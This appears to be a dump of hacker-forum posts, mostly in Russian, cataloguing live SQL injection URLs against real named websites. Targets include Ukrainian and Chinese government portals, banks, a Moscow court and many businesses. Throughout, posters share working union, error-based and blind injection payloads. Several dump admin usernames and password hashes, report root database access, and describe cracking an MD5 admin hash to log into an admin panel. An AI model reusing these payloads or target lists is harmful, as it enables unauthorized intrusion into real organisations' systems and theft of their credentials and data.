4.1.18:[email protected]:wwwtrtru тиц 350 выводим в ошибке! Version: 4.1.25-log: DB: ilingra6_site user: ilingra6_bd@localhost OS: portbld-freebsd6.3
Code: http://flyingweb.dreamhosters.com/note_news.php?rid=-10+union+select+1,2,3,4,group_concat(concat_Ws(0x3a,loginName,password)),6,7,8,9,10,11,12,13,14,15,16+from+flyingweb.flyingweb_admin_user--- 5.0.67-userstats-log flyingweb [email protected]
Коммунистическая партия Китая. Организация департамента Dashiqiao http://www.dsqzzb.gov.cn/kxfz/news.php?sid=-23+union+select+1,version()--+ У кого там зуб на Украину? .. у меня нет.. ) Там щас выборы в Украине..Потому.. Официйний сайт Державного департамента з усиновлення та захисту прав дитини Міністерства України у справах сім'ї, молоді та спорту http://www.ditu.gov.ua/en/decrees/-2177+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,10,11,12,13,14,15,16+from+mysql.user--+ user() - root@localhost version() - 5.0.51b-community-nt-log database() - depdeti file_priv = Y /phpmyadmin/ присутствует /admin/ тоже Чернігівська облдержадміністрація http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+from+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+from+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,user||chr%2858%29||passwd+from+com.users+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu http://cg.gov.ua/static_list.php?menu_id=1&NameTable=static_list&TypeCod=&DEPAT=29+and+1=cast%28%28SELECT+current_user||chr%2858%29||current_database%28%29||chr%2858%29||version%28%29%29+as+int%29--&pm=blue_menu http://sosadm.cg.gov.ua/single_page.php?menu_id=-5+and+1=cast%28%28SELECT+current_user||chr%2858%29||current_database%28%29||chr%2858%29||version%28%29%29+as+int%29--&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu user - www database - portal version - PostgreSQL 8.3.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.2.4 Как я понял, все поддомены там под одним юзвером и двигом. Получается добавим список уязвимых (под)сайтов. bobradm.cg.gov.ua borzadm.cg.gov.ua chernrda.cg.gov.ua goradm.cg.gov.ua ichadm.cg.gov.ua koradm.cg.gov.ua kpadm.cg.gov.ua kuladm.cg.gov.ua meadm.cg.gov.ua neadm.cg.gov.ua nosadm.cg.gov.ua novgadm.cg.gov.ua oda.cg.gov.ua pladm.cg.gov.ua rpadm.cg.gov.ua schorsadm.cg.gov.ua semadm.cg.gov.ua sribadm.cg.gov.ua taladm.cg.gov.ua varadm.cg.gov.ua не кисло Система розкриття інформації на фондовому ринку України. Агентство по развитию инфраструктуры фондового рынка Украины http://www.smida.gov.ua/emitents/zvit_menu.php?id=4746+and+substring(version(),1,1)=4&forma=PERSON_Z&zvit_type=zat414&kod=32979387 http://old.smida.gov.ua/news/sv_1.php?id_news=-8077+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14 Disallow: /adminzone/ phpinfo.php на месте user() - dbu@localhost version() - 4.1.20-log database() - smida ВИЩА КВАЛІФІКАЦІЙНА КОМІСІЯ АДВОКАТУРИ при Кабінеті Міністрів України http://www.vkka.gov.ua/index.php?page=katalog&id=-41+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+ version() - 5.1.30-log user() - vkka_root@localhost database() - vkka_adv все выводиться на ура админка присутствует.
Если кому интересно, большинство сайтов тицастые и пиаристые. ---1--- http://mgta.ru/raspisania/rasp'+or(1,1)=(select+count(*),concat(concat(1,0x3a,(select+concat(user,0x3a,password,0x3a,file_priv)+from+mysql.user+LIMIT+0,1)),floor(rand(0)*2))from+mysql.user+group+by+2)--+/ version() - 5.0.841 user() - meli@localhost1 database() - wwwmeliru_sb1 Права на запись есть. ---3-blind--- http://nova-budova.com.ua/?n=press_center&type=shares'+and+substring(version(),1,1)='5 5-я версия //=============================================== start usoft Уязвимости от компании Ю-софт. Разрабатывают сайты 16 лет. Особенность: 1. На некоторых уязвимых сайтах нельзя подставить 'пробел' '*'. Вывод ошибки работает в опере, в мозиле не работает. Все сайты которые я просмотрел, я вылаживаю. Возможные варианты вывода. ---4-банк--- http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select(name_const((select(table_name)from(information_schema.tables)where(table_name)LIKE('CHARACTER_SETS')),1)),name_const((select(table_name)from(information_schema.tables)where(table_name)LIKE('CHARACTER_SETS')),1))a)='5/ http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5 Остальные сайты.. ---6-Blind. Ещё один сайт юсофта--- Тут пробелы не фильтруются, но и вывода в дублях нету. поэтому получается blind inj http://u-torg.ru/news/?act=show_news&id=2489+and+substring(version(),1,1)=5# ---7-Компания--- http://www.interstroy-v.ru/objects/ob30'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5 ---8-компания--- http://www.priorityins.ru/fiz'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5 ---9-Банк солидарность--- http://www.solidar.ru/news'or(1,1)=(select(0)from(select+name_const(version(),1),name_const(version(),1))a)='5/new_kart/ ---10-blind. Какой сайт, понятно по названию--- http://mos-gorsud.ru/news/?id=235+and+lower(ascii(substring(user(),1,1)))=114 root@.... Ну и в заключение... ---11-Usoft--- Ну собственно как же оставить без внимания сам сайт Ю-софта.. Для начала найдём какуе-то инъекцию у них на сайте. А именно... http://www.usoft.ru/vopros/legalnews'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5/ Всё ок, но как же нам упростить задачу по перебору? Давайте посмотрим что там ещё висит у них.. Находим такой поддомен. http://pilot.usoft.ru Составим запрос для подбора таблички. http://pilot.usoft.ru/?tid=4+or(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+limit+17,1),floor(rand(0)*2))from(information_schema.tables)+group+by+1)+--+ Теперь для быстрого подбора колонки. Я сделаю это так. http://pilot.usoft.ru/?tid=4+or(1)=(select+*+from(select+*+from+auth_user+as+a+auth_user+as+b+USING(id))c)--+ Далее собственно подставляем в USING то что вылазит в эроре. Ну а потом, достаем логины и пароли. Пароли там в md5, но первый же юзер как ни странно админский с хешем который мгновенно расшифровуется через crackfor.me Ну и в конце логинимся через /admin/, никакх защит по ip как ни странно там нету. Внимание! В примере номер 11 стоит моя личная защита "антидурак" //================================================ end usoft ---12-сайт не ломать --- http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from information_schema.tables a JOIN information_schema.tables b)c)='1 http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from (select * from information_schema.tables a)b JOIN (select * from information_schema.tables d)c USING(TABLE_CATALOG))g)='1 запятые косят запрос. Получилось вывести только так. Если кто выведет проще, буду рад посмотреть. ---13--- http://www.vstoneft.ru/analit.php?number=141+union+select+1,2,3,4,5,6,version(),8,9-- ---14--- http://www.mebel-aliance.ru/tables.php?id=63'+union+select+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10,11,12,13,14+from+information_schema.columns--+ без ограничения ---15--- http://www.platforma.ru/search/?search=%'+and+(1,1)=(select+count(*),concat(version(),floor(rand(0)*2))from+essentials+group+by+2)+--+ version() - 4.1.21 user() - [email protected] database() - platforma //================================================ start News Edit Движок News Edit от Newsedit.ru Снова ошибка в переменной которая обратабывается через .htaccess, такое чувство разработчики думают, что htaccess что-то фильтрует. ---16--- http://www.wn.ru/video/01.12.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html ---17--- http://www.cdrinfo.ru/news/28.10.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html ---18--- http://www.parovozik.ru/news/11.11.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html ---19-1500 тица --- тут пароля в открытом виде http://pro-n.ru/news/12.01.2010/2+union+select+1,version%28%29,3,4,5,6,7,8,9,10+from+users--.html //================================================ end News Edit ---20--- ууу, какой страшный сайт.. http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+limit+26,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)+--+ http://www.stalin.su/book.php?bid=1+or(1,1)=(select*from(select*from+st_xuser+as+a+join+st_xuser+as+b+USING(id))c)+--+ http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,access,login,password)+from+st_xuser+LIMIT+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)+--+ ---21--- http://www.inform-soccer.com/TOTO/tstscores.php3?TURNIR=409&ID=-158682+union+select+1,2,3,version(),5,6-- version() - 4.1.25-log user() - soccer@localhost database() - inform_soccer_com ---22-Blind--- http://www.skoma.ru/catbuilder.php?id=24+and+substring(version(),1,1)=4 ---23--- http://www.stroimarket.info/goods.php?viewprod=2&id=5&pid=10'+or(1,1)=(select+*+from(select+name_const((select+table_name+from+information_schema.tables+WHERE+table_name+LIKE+'%user%'+LIMIT+0,1),1),name_const((select+table_name+from+information_schema.tables+WHERE+table_name+LIKE+'%user%'+LIMIT+0,1),1))a)/* ---24--- вывод смотрите в html, он вообщем в хрефе. http://mirrortuning.ru//oneadmin/ http://mirrortuning.ru/photos.php?category_id=&parent_id=-0+UNION+SELECT+version(),2&photo_id=18&start=123 Database Version: 5.0.67-userstats-log Database name: mt User name: [email protected] ---25-Blind--- http://www.gestia.com.ua/fs/wywod_stati/?showiblo=332'+and+substring(version(),1,1)=4/* ---26--- Вывод после редиректа в адресной строке. http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(version(),database(),user()),9,10 http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name),9,10+from+information_schema.tables+where+table_name+LIKE+'%user%'+LIMIT+0,1 ---28--- Без ограничений. http://www.infra-audit.ru/doc.php?doc_id=4+union+select+1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7+from+information_schema.columns ---29--- Без ограничений. http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND%20_goods.is_publish=%271%27%20AND%20_subcats.is_publish=%271%27%20AND%20_cats.is_publish=%27%27%20AND%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods.idc%20union+select+1,2,3,4,5,concat_ws%280x3a,table_schema,table_name,column_name%29,7,8,9+from+information_schema.columns+where+table_name=%27_users%27+--+ http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND%20_goods.is_publish=%271%27%20AND%20_subcats.is_publish=%271%27%20AND%20_cats.is_publish=%27%27%20AND%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods.idc%20union+select+1,2,3,4,5,concat_ws%280x3a,login,assword,mail%29,7,8,9+from+_users+LIMIT+200+--+ http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND%20_goods.is_publish=%271%27%20AND%20_subcats.is_publish=%271%27%20AND%20_cats.is_publish=%27%27%20AND%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods.idc%20union+select+1,2,3,4,5,concat_ws%280x3a,admin_firstname,admin_lastname,admin_password,admin_email_address,admin_right_access%29,7,8,9+from+admin+LIMIT+200+--+ ---30--- http://www.iie.tpu.ru/ru/seenews.php?IDNews=159+and+substring(version(),1,1)=3 3-я версия. ---31--- http://bellenmetip.net/actueel/nieuws/329/nassau-academy-unieke-samenwerking-onderwijs-en-bedrijfsleven'+or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))b)+--+/ ---32-blind--- http://www.arbonica.ru/marketing'+or+substring(version(),1,1)=5--+/ перебирать можно так.. http://www.arbonica.ru/marketing'+and+lower(ascii(substring(user(),1,1)))=114 юзвер != рут ---33--- Sweb блочит 'from', через post - сценарий не работает. Потому можно получить только user(), version() etc... http://www.beauty-fitness.ru/users/?id=-1324'+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+ ---34--- http://www.my-antiage.ru/index.php?id=49+union+select+1,2,3,4,5,version(),7,8,9-- version() - 4.1.25-log user() - lipopla8_sdr@localhost database() - lipopla8_acc ---35--- http://cdd.aac.ru/index.php?id=20'and(substring(version(),1,1))=4--+ ---36--- http://www.chuvrdub.ru/base/base.html?mode=aut&id=-47+UNION+SELECT+1,2,version(),4-- version() - 5.0.84-percona-highperf-b18-log user() - [email protected] database() - anhelga_authors ---37--- http://www.hedef-makina.com/ru/index.php?p=sayfa&item=duyuru&id=-27+union+select+1,2,3,database(),5,6,7,user(),9,10,11-- 5.0.45-community-nt hedef-makina hedef@localhost ---41--- Без ограничений http://www.sotovyi.ru/index.php?cid=11&pid=63/**/union/**/select/**/concat(table_schema,0x3a,table_name,0x3a,column_name),2,3,4,5,6/**/from/**/information_schema.columns-- ---42--- http://parkhotelgardenia.com/conference_hall.php?pos=6+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4 version() - 5.0.85-community-log user() - prkhote_slava@localhost database() - prkhote_gardenia Забыл какая тут табличка, а переберать в 5 утра лень) Но помню что там колонки id:usernameassword:idrights:realname И пароль там подходит от мыльника админа -------------------------------------------- Есть конечно ещё вкусное, но не всё сразу.. Чем больше критики, тем лучше, желательно пм. Спасибо за внимание.
PR 5 ТИЦ 700 5.0.77-log:website:[email protected]ortbld-freebsd7.0 BD: Code: information_schema:anketa:asut:dbmail:dspam:fotonika2009:glpi:invitation:ipacct:jabberd2:joomla:lib_mba:library:mysql:ng_stat:norma:ocsweb:olka:site:symposium:system_ball:test:test_lib:thesis:website:ysc:ysc_copy Code: body:body_eng:news:structure:structure_admin:structure_eng:users с результата запроса и ежу понятно что не одна таблица users (есть в других БД) когда узанем атрибуты таблы users вот они ^_^ Code: id:login:pass:ip:last_keepalive:type:enabled:day_quota:month_quota:fullname:desc:admin_level:id:name:passwd:sotrid:chek:id:surname:fname:secname:email:name_doclad:type_doclad:check_send:check_confirm:auth_doclad:id:name:passwd:sotrid:chek:id:user_login:user_password:user_type логин и пасс В гугле несколько каталогов с которыми работают БД перечислены выше ,и у всех пр 5 когда посмотреть! через этот сайт можно доставать инфу . магические включены, есть webmail и еще много вкусностей, алгоритмы шифрования пассов md5 и mysql , кстати читалка в скуле работает , забыл сказать и хешкрекинг.инфо не выдал пасс md5 , но зато есть темка на античате <on-line сервисы розшифровки> то там нашел ;-) в гугле для поиска других Ех,класно что опять античат то заработал
giscripts.in Code: http://www.giscripts.in/b2b/selloffers.php?cid=-14+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8-- Code: 5.0.81-community:yellowpa_glrd@localhost:yellowpa_b2b secureb2b.com Code: http://www.emerix.com/selloffers.php?cid=-1+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8-- Code: 5.0.51a-24+lenny2-log:ks8136@localhost:ks8136db1
Code: http://www.vertavo.com/repspecs.php3?counter=-254+union+select+1,2,3,4,5,6,7,8+from+admin+--+ Code: http://www.multistore.ch/index.php?catid=864+union+select+1,2,unhex(hex(user())),4,5,6+/*+&subcatid=224http://www.donpaco.ch/events_det.php?galerie_id=-278+union+select+1,2,3,4,5,6,7,8,9,10+--+ Code: http://www.impuls-nn.ru/shop/more/?iid=-100012860+union+select+1,2,3,4,5,concat_ws(0x3a3a,cid,clogin,cpass,corg,ctype),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+impulse_users+where+ctype=0+--+ Code: http://www.beautifulpalestine.com/largpic.php?id=-312+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7+from+members+--+&lid=13 Code: http://apla-pal.org/show_news_details.php?id=-85+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273+--+ Code: http://nhn.meerbusiness.nl/partners/partners_showitems.asp?type=sponsor'+uNIon+seLEct+1,2,3,4,5+--+&content_id=6 Code: http://femgmbh.com/photogallery.php?action=liste&rubrikid=63+union+select+database(),2+/*+ Code: http://www.singaporechefs.com/publicsite/newsdetail.php?id=-48'+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user+--+ Code: http://www.asiacuisine.com.sg/eventcalendar.php?eventdate=-2010-1-24'+union+select+1,concat_ws(0x3a3a,user_id,username,password,enpassword,ip,lastlogin,lastlogout,privilege),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+cwa_user+--+ Code: http://www.gourmetabudhabi.ae/ad2010/english/representative.php?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user+--+ Code: http://www.wacs2000.org/wacs2009_beta/en/culinary_programs/competition.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,unhex(hex(group_concat(TabLe_NamE))),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+group+by+table_schema+limit+2,1+--+ Code: http://www.fischergold.de/index.php?id=-51+union+select+1+--+ Code: http://www.alice-miller.com/readersmail_en.php?lang=en&nid=-2927+union+select+1,2,3,4+--+&grp=0110 Code: http://www.presidence.bf/listArticles.php?sid=-10+union+select+1,2,concat_ws(0x3a3a,username,password),4+from+pbf_users+--+&page=1&articlesPerPage=5 Code: http://southindianpost.com/gallery/index.php?page=1&category=1.1&photoId=-2+union+select+1,2,3,4,5,6,7,8,9,10+--+ Code: http://satorisalon.ru/satlist.php?idp=-145'+union+select+1,2,3,4,5,6,7,8,9+--+ Code: http://www.ivanenko.name/showpart.php?idp=-3'+union+select+1,2,3,4,5,6,7,8,9+from+information_schema.tables+--+ Code: http://www.matuls.pl/index.php?IDP=1&Lng=1&IDKategoria=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,UserPass,UserName,UserEmail),9+from+CMSUsers+limit+0,1+--+ Code: http://www.panterafilms.ru/portf/work.php?idp=-65+union+select+1,2,3,4,5,6,7,8,9,10+from+cns_config+--+
http://www.azez.ru/ind.php?pn=2&id_typ=-239+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28-- sql 5 pr 5 тиц 10
Code: http://yugo-vostok.org/?sec=artical&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8/* Code: ugo@localhost@localhost:ugo:5.0.32-Debian_7etch11-log
Code: [+]Printable field: 2 [+]Vuln URL: http://www.tiboschtrading.nl/details.php?id=-54+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- Code: [+]Printable field: 5,6 [+]Vuln URL: http://www.pascal-tie.com/production/details.php?id=-44+UNION+SELECT+1,2,3,4,5,6,7,8,9-- [+]MySQL Info: murakami@localhost:4.1.20:tie_com:binjredhat-linux-gnu Code: [+]Printable field: 2,4 [+]Vuln URL: http://www.infinspb.ru/index.php?id=-217+UNION+SELECT+1,2,3,4,5,6-- [+]MySQL Info: [email protected]:4.1.22-log:mega470_infin:binjportbld-freebsd6.2
Code: http://www.lv/list.php?id=-1+UNION+SELECT+1,2-- Code: http://www.babynamefacts.com/namelists/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11-- Code: http://dl.game.21cn.com/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Code: http://atsta.net/list.php?id=-1+UNION+SELECT+1,2,3,4-- Code: http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,3,4-- Code: http://robassales.co.za/product-list.php?id=-1+UNION+SELECT+1,2,3,4,5,6-- Code: http://www.99dq.com/hyqqbxdclw/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- Code: http://www.hipickbuy.com/list.php?id=-1+UNION+SELECT+1-- Code: http://www.castlight.com.au/list.php?id=-1+UNION+SELECT+1-- Code: http://www.palmasta.com/list.php?clang=-1+UNION+SELECT+1-- Code: http://www.megamarkets.com.au/shopping/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- Code: http://www.bulgarianpropertysale.co.uk/list.php?region_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%E2%80%8B,26,27-- Code: http://www.ecoogimall.com/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6-- Code: http://www1.hfut.edu.cn/organ/wsbgs/ch/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6-- Code: http://www.belldavispitt.com/practice.php?id=-1+UNION+SELECT+1,2,3,4,5,6-- Code: http://mmc.awesomemath.org/practice.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7-- Code: http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6-- Code: http://www.nashashmi.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4-- Code: http://www.lvnoon.co.uk/image-viewer.php?Id=-1+UNION+SELECT+1,2,3-- Code: http://central.nightglass.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9-- Code: http://sturgisrallydaily.com/sturgis_rally_news/history/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12-- Code: http://www.jakeabramson.com/Viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12-- Code: http://www.postautobody.com/restoration/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7-- Code: http://www.weir-tscs.com/articles-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10-- Code: http://www.darkcrystalis.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4-- Code: http://www.pegplay.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4-- Code: http://scientificcomtech.com/news-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5-- Code: http://www.barneybags.co.uk/page-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12-- Code: http://www.teaseumcams.com/viewer.php?id=-1+UNION+SELECT+1,2-- Code: http://www.hardbodyvideo.com/viewer.php?id=-1+UNION+SELECT+1,2--
Code: http://www.thefalesteam.com/buy.php?ID=13+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12+--+ Version:5.0.77 User:fales_web@localhost Database:fales
http://www.pridepools.com/display.php?pid=-10+UNION+SELECT+1,2,3,4 Database Version: 5.0.67.d7-ourdelta-log Database name: pride User name: [email protected]
5.0.87-community-log localcom_communi@localhost localcom_nbsupportforums 5.0.87-community-log clantige_communi@localhost clantige_community 5.0.45 root@localhost sstb_forum 5.0.87-percona-highperf [email protected] ispyderz_ispyderz 5.0.32-Debian_7etch11-log [email protected] livingtheprofs_ 5.0.45-community-nt akademi@localhost aksuakad_
http://www.caentechnologies.com/nuclear/news.php?id=1+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10+from+information_schema.tables--
http://www.neolitica.ru/index.php?r_id=-1+UNION+SELECT+1,2,3,4,5,6-- http://zooclub.ru/article.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9-- http://www.kidsmile.ru/news/detail.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6--
